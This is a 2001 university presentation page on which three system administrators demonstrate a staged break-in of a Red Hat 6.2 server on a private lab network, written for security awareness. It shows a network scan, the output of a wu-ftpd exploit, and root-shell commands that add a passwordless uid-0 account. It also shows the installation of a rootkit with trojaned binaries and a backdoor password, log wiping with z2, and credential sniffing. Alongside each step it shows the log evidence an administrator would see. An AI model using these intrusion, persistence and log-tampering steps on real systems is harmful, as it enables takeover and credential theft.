UNIX Cracking Presentation - Fall 2001 for CISD

• Introduction
• Hardware Description
• Software Description
• The Crack

Return to the Top of Page

Introduction

The Presenters

• Isaac W. Traxler
  B.S in Mathematics, M.S. in Computer Science. A systems administrator for over 20 years.

• Allen B. Gordon
  B.S in Computer Science. A systems administrator for over 5 years.

• Brian D. Ropers-Huilman
  B.S in Electrical Computer Engineering. A systems administrator for over 10 years.

The Presentation

This presentation will demonstrate a live crack of a GNU/Linux server. Although we have "pre-staged" the software, and have obviously tested the entire scenario, all the techniques and software we will use were gathered from the Internet.

This presentation is not a lesson on "How To Crack." Instead, the focus will be on demonstrating the mechanics of a crack with a typical cracker scenario. As such, we will spend much of the time looking at the state of the cracked system. Our point is to show how simple it can be to crack a vulnerable system, given the necessary tools, preparation, and enough time.

Throughout the presentation we will attempt to make each step clear by defining the purpose of a task and giving a top-level explaination of the technology being used. Please feel free to ask clarifying questions as the presentation progresses.

Scenario

Return to the Top of Page

Hardware Description

This is a description of each of the systems used in the demonstration. They are all connected to a completely private Ethernet network.

Cracked System

• The primary server for Here.com
• IBM 350 (P @ 166 MHz, 64 MB RAM)
• Default RedHat v6.2 Server Install
• server.here.com
• 192.168.3.2

Cracker's System

• A workstation on Here.com's company network
• IBM ThinkPad 760ED (P @ 133 MHz, 48 MB RAM)
• Custom RedHat v7.1 Install
• emaca.here.com
• 192.168.3.236

Employee / Presentation System

• An employee's system on Here.com's company network
• IBM ThinkPad 770ED (PII @ 233 MHz, 192 MB RAM)
• Custom RedHat v7.1 Install
• john.here.com
• 192.168.3.3

Network

• Simulated Here.com company network
• 3Com Home Connect Hub, 5 port 10 Mb/sec with Category 5 cables
• /etc/hosts without DNS
• Domain here.com
• 192.168.3.0/24

Return to the Top of Page

Software Description

This is a description of all the major software used on each of the systems. Again, it should be pointed out that all of this software was pulled directly from the Internet.

Cracked System

• Default services running (httpd, ftp, nfs, etc.) based on RedHat v6.2 default server installation
• No customizations, except to add a legitimate employee john, so that he can do his work

Cracker's System

• nmap v2.54-BETA26-1
• Exploit for wu-ftpd
• RootKit IV for GNU/Linux

Employee / Presentation System

• telnet client to connect to the server
• vi text editor, the best HTML editor in the world

Return to the Top of Page

The Crack

Here is a top level view of how the crack will proceed:

• Use nmap to discover the Here.com network
• wu-ftpd exploit
• Complete the Takeover

Return to the Top of Page

nmap of Here.com

The cracker

nmap, available from http://www.nmap.org, provides "network-wide ping sweep, portscan and OS detection." It is a tool widely used, by both crackers and network/system administrators, to map out a network.

The cracker runs nmapfe, the graphical interface to nmap, using the defaults:

• SYN Stealth
• TCP & ICMP
• OS detection

The cracker only needs to enter the IP network to scan: 192.168.3.0/24 (which is the base network address with the number of bits in the sub-net mask).

The command-line would be:

nmap -sS -O 192.168.3.0/24

Here's the output:

Starting nmap V. 2.54BETA26 ( www.insecure.org/nmap/ )
Host   (192.168.3.0) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Adding open port 513/tcp
Adding open port 1024/tcp
Adding open port 111/tcp
Adding open port 956/tcp
Adding open port 23/tcp
Adding open port 113/tcp
Adding open port 79/tcp
Adding open port 80/tcp
Adding open port 21/tcp
Adding open port 514/tcp
Adding open port 515/tcp
Adding open port 98/tcp
Adding open port 25/tcp
Interesting ports on server.here.com (192.168.3.2):
(The 1535 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp                     
23/tcp     open        telnet                  
25/tcp     open        smtp                    
79/tcp     open        finger                  
80/tcp     open        http                    
98/tcp     open        linuxconf               
111/tcp    open        sunrpc                  
113/tcp    open        auth                    
513/tcp    open        login                   
514/tcp    open        shell                   
515/tcp    open        printer                 
956/tcp    open        unknown                 
1024/tcp   open        kdm                     

Remote operating system guess: Linux 2.1.19 - 2.2.17
Uptime 0.802 days (since Tue Jul 10 17:57:49 2001)
Adding open port 111/tcp
Adding open port 22/tcp
Adding open port 6000/tcp
Adding open port 3306/tcp
Adding open port 113/tcp
Adding open port 80/tcp
Adding open port 443/tcp
Interesting ports on john.here.com (192.168.3.3):
(The 1541 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh                     
80/tcp     open        http                    
111/tcp    open        sunrpc                  
113/tcp    open        auth                    
443/tcp    open        https                   
3306/tcp   open        mysql                   
6000/tcp   open        X11                     

Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 0.048 days (since Wed Jul 11 12:03:22 2001)
Adding open port 7/tcp
Adding open port 1024/tcp
Adding open port 111/tcp
Adding open port 22/tcp
Adding open port 6000/tcp
Adding open port 23/tcp
Adding open port 3306/tcp
Adding open port 113/tcp
Adding open port 80/tcp
Interesting ports on emaca.here.com (192.168.3.236):
(The 1539 ports scanned but not shown below are in state: closed)
Port       State       Service
7/tcp      open        echo                    
22/tcp     open        ssh                     
23/tcp     open        telnet                  
80/tcp     open        http                    
111/tcp    open        sunrpc                  
113/tcp    open        auth                    
1024/tcp   open        kdm                     
3306/tcp   open        mysql                   
6000/tcp   open        X11                     

Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 0.055 days (since Wed Jul 11 11:53:36 2001)
Host   (192.168.3.255) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.

Nmap run completed -- 256 IP addresses (3 hosts up) scanned in 13 seconds

Now knowing that server is a GNU/Linux system (nmap told us it was running a GNU/Linux kernel), the cracker uses telnet to try and determine which version of GNU/Linux is running, hoping for a default "welcome message:"

[root@emaca log]# telnet server.here.com
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login: 
telnet> quit
Connection closed.
[root@emaca log]# exit

The server

• /var/log/messages only shows a inetd process exiting, which could be anything

  
  May 16 19:40:59 server inetd[491]: pid 695: exit status 1
  

• /var/log/secure showed the telnet connection used above.

  
  May 16 19:40:54 server in.telnetd[695]: connect from 192.168.3.236
  

Security conscious system administrators looking at their logs will see a telnet connection without a corresponding login and may become suspicious.

Return to the Top of Page

wu-ftpd Exploit

The server before the crack

[root@server /root]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
john:x:500:500::/home/john:/bin/bash

The cracker

• server is running an FTP server
• server is a RedHat v6.2 GNU/Linux system
• RedHat v6.2 GNU/Linux uses wu-ftpd v2.6.0-3 as the default FTP server

Based on this, the cracker tries a wu-ftpd exploit.

[root@emaca wu-ftp]# ./f server
Connected to: server 
Banner: 220 server.here.com FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
 
Logged in.. 
+ Finding ret addresses 
[1m[32mWuftpd is vulnerable : 200-31 bffff548 1ee bfffd4d0 +bfffd0cc |0
200  (end of '%x %x %x %x +%x |%x')
 
[0mRet location befor: 0 
Ret      location : bfffd074 
Proctitle addres  : 807347b and 134689915 
tmp 1  : 0x62626262
tmp 2  : 0x0
tmp 1  : 0xbfffd074
Cached a : 24 
Trying with : 23 
[1m[33m Wait for a shell.....
[0m200-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbtÐÿ¿-2-2000-200000000000000000000000000
0000000nan00000000-2000000000000000000000000000000000000000000000000000000000000
00000000000000-2-240nan0-10737512241074522093-10737512241074533003-1073751144107
5212780-1073751144-1073750870-10737508661713262567819201692631852400175188667652
71702389037163375907516337718731633771873163377187316337718731633771873163377187
31633771873|00000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
.
.
.
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000

This exploit works! The cracker can then do the following:

• hostname -- we're on server
• whoami -- root!!!
• who -- cracker is hidden
• echo $SHELL -- to see what shell we have
• export PATH="$PATH:/usr/sbin" -- to add the good stuff to our path
• echo $PATH -- confirm the new path
• adduser -u 0 -g 0 r00t -- a classic cracker root equivalent user (to control the system)
• passwd -d r00t -- remove the password for r00t
• adduser jroberts -- an unpriveleged user account (to allow a telnet connection later)
• passwd -d jroberts -- remove the password for jroberts

The exploit gives the cracker a "root shell" into the server system, but there is no prompt for the shell because it's being handled by the FTP server. Here are the actual commands the cracker types and the real output:

hostname
server
whoami
root
who
root     tty1     May 16 19:37
john     pts/0    May 16 19:42
echo $SHELL
/bin/bash
echo $PATH
/usr/local/bin:/bin:/usr/bin
export PATH="$PATH:/usr/sbin"
echo $PATH
/usr/local/bin:/bin:/usr/bin:/usr/sbin
adduser -u 0 -g 0 r00t
passwd -d r00t
Changing password for user r00t
Removing password for user r00t
passwd: Success
adduser jroberts
passwd -d jroberts
Changing password for user jroberts
Removing password for user jroberts
passwd: Success
exit
Connection closed - EOF 
[root@emaca wu-ftp]# 

At this point, the server system is effectively under the control of the cracker (owned)!

The server

• /var/log/messages -- shows the wu-ftpd buffer overflow and the addition of the new accounts

  
  May 17 01:01:19 server ftpd[746]: ANONYMOUS FTP LOGIN FROM emaca.here.com
  [192.168.3.236], 1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1
  À^^H°^LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11
  May 16 20:04:35 server adduser[756]: new user: name=r00t, uid=0, gid=0,
  home=/home/r00t, shell=/bin/bash 
  May 16 20:05:42 server adduser[758]: new group: name=jroberts, gid=501 
  May 16 20:05:42 server adduser[758]: new user: name=jroberts, uid=501, gid=501,
  home=/home/jroberts, shell=/bin/bash 
  

• /var/log/secure -- shows the original FTP connection

  
  May 16 20:01:18 server in.ftpd[746]: connect from 192.168.3.236
  

At this point, the administrator would realize they have been cracked and would start looking, in detail, at their system. The easiest thing to look at is the /etc/passwd file:

[root@server /root]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
john:x:500:500::/home/john:/bin/bash
r00t:x:0:0::/home/r00t:/bin/bash
jroberts:x:501:501::/home/jroberts:/bin/bash

Return to the Top of Page

Complete the Takeover

The cracker

• Hiding -- from the real system administrator
• Backdoor -- test the RootKit backdoor for future access
• Clean Up -- clean up logs to hide tracks
• Collect Data -- linsniff, dsniff, /etc/passwd file, etc.
• Use the System -- IRC server, bounce point for other cracks, warez, etc.

Hiding

[root@emaca rk]# ftp server
Connected to server.here.com.
220 server.here.com FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
Name (server:root): jroberts
331 Password required for jroberts.
Password: <ENTER>
230 User jroberts logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put l.tar.gz
local: l.tar.gz remote: l.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for l.tar.gz.
226 Transfer complete.
3207597 bytes sent in 3.44 secs (9.1e+02 Kbytes/sec)
ftp> quit
221-You have transferred 3207597 bytes in 1 files.
221-Total traffic for this session was 3208018 bytes in 1 transfers.
221-Thank you for using the FTP service on server.here.com.
221 Goodbye.
[root@emaca rk]#

The cracker will connect to the server system:

[root@emaca rk]# telnet server
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login: jroberts
Last login: Wed May 16 20:36:29 from emaca.here.com
[jroberts@server jroberts]$

The cracker becomes r00t and unpacks their tools:

[jroberts@server jroberts]$ su - r00t
[root@server r00t]# cd ~jroberts
[root@server jroberts]# ls -l
total 3140
-rw-r--r--    1 jroberts jroberts  3207597 May 16 20:42 l.tar.gz
[root@server jroberts]# tar -xzf l.tar.gz
[root@server jroberts]# ls
MCONFIG    bindshell.c     findutils  hdar          login
psmisc     sniffchk        wted.c     Makefile      chfn
fix        inetd           net-tools-1.32-alpha     rootkit.h
sysklogd-1.3               z2         README        chsh
fix.c      l.tar.gz        passwd     rshd          tcp.log
z2.c       bin             cron3.0pl1 hdap          linsniffer
procps-1.01                shadow-961025            tcpd_7.4
bindshell  fileutils-3.13  hdaq       linsniffer.c  procps-1.01_mess
sniff.pid  wted
[root@server jroberts]# 

Next, the cracker installs the pre-compiled RootKit:

[root@server jroberts]# make install
if [ -x /usr/bin/chfn ] && [ -x bin/chfn ]; then ./fix /usr/bin/chfn bin/chfn; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chfn fixed
if [ -x /usr/bin/chsh ] && [ -x bin/chsh ]; then ./fix /usr/bin/chsh bin/chsh; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chsh fixed
.
.
.
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /bin/killall ]; then
ln -sf /bin/killall psmisc/pidof; fi
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then
ln -sf /usr/bin/killall psmisc/pidof; fi
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then
./fix /usr/bin/pidof psmisc/pidof; fi
if [ -x /sbin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then
./fix /sbin/pidof psmisc/pidof; fi
if [ -x /usr/bin/find ] && [ -x findutils/find/find ]; then
./fix /usr/bin/find findutils/find/find; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/find fixed
[root@server jroberts]# 

The fix commands running above are attempting to change the checksums, from the sum command, to match the original versions of the commands that are being replaced by their trojaned versions.

Backdoor

[root@emaca log]# telnet server
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586

server login: root
Password: satori
[root@server /root]# who
root     tty1     May 16 19:37
john     pts/0    May 16 19:42
[root@server /root]#

The root connection is from the console and the john connection is from our legitimate user doing their work. Also note that on the initial telnet connection the message configuration error - unknown item 'CREATE_HOME' (notify administrator) is displayed. This should be an indication to the system administrator of server that something is wrong!

Clean Up

[root@server /root]# last
jroberts ftpd970      emaca.here.com   Wed May 16 20:41 - 20:42  (00:00)    
jroberts ftpd965      emaca.here.com   Wed May 16 20:39 - 20:41  (00:02)    
jroberts pts/1        emaca.here.com   Wed May 16 20:38 - 21:00  (00:22)    
jroberts pts/1        emaca.here.com   Wed May 16 20:36 - 20:38  (00:01)    
jroberts ftpd857      emaca.here.com   Wed May 16 20:34 - 20:35  (00:01)    
ftp      ftpd823      emaca.here.com   Wed May 16 20:30 - 20:31  (00:00)    
jroberts pts/1        emaca.here.com   Wed May 16 20:29 - 20:30  (00:00)    
jroberts ftpd772      emaca.here.com   Wed May 16 20:28 - 20:29  (00:00)    
ftp      ftpd746      emaca.here.com   Wed May 16 20:01   still logged in   
john     pts/0        192.168.3.3      Wed May 16 19:42   still logged in   
root     tty1                          Wed May 16 19:37   still logged in   
reboot   system boot  2.2.14-5.0       Wed May 16 19:37          (02:12)    
[root@server /root]# cd /dev/hda01
[root@server hda01]# ./z2 jroberts
Zap2!
[root@server hda01]# ./z2 jroberts
Zap2!
.
.
.
[root@server hda01]# ./z2 ftp
Zap2!
[root@server hda01]# last
john     pts/0        192.168.3.3      Wed May 16 19:42   still logged in   
root     tty1                          Wed May 16 19:37   still logged in   
reboot   system boot  2.2.14-5.0       Wed May 16 19:37          (02:23)    

The cracker removes the two special users that were created:

[root@server hda01]# export PATH="$PATH:/usr/sbin"
[root@server hda01]# userdel r00t
[root@server hda01]# userdel jroberts
[root@server hda01]# rm -fr /home/jroberts
[root@server hda01]# rm -fr /home/r00t

Collect Data

[root@server hda01]# nohup ./linsniffer &
.
.
.
[root@server hda01]# cat tcp.log
emaca.here.com => server.here.com [21]
USER john
PASS abc123
TUSYST
Y
QUIT

=
----- [FIN]
[root@server hda01]#

Use the System

The cracker could either automate the transfer of linsniffer logs or could periodically login, unseen, and collect them. At this point, the cracker can move around completely invisible to the real system administrator and do whatever they want (almost...).

Server

---

The statements and opinions included in these pages are those of Isaac W. Traxler, Brian D. Ropers-Huilman, Allen B. Gordon only. Any statements and opinions included in these pages are NOT those of Louisiana State University or the LSU Board of Supervisors.
© 1999-2001 Isaac W. Traxler, Brian D. Ropers-Huilman, Allen B. Gordon

---

This page last updated 2001/10/19 15:54:50.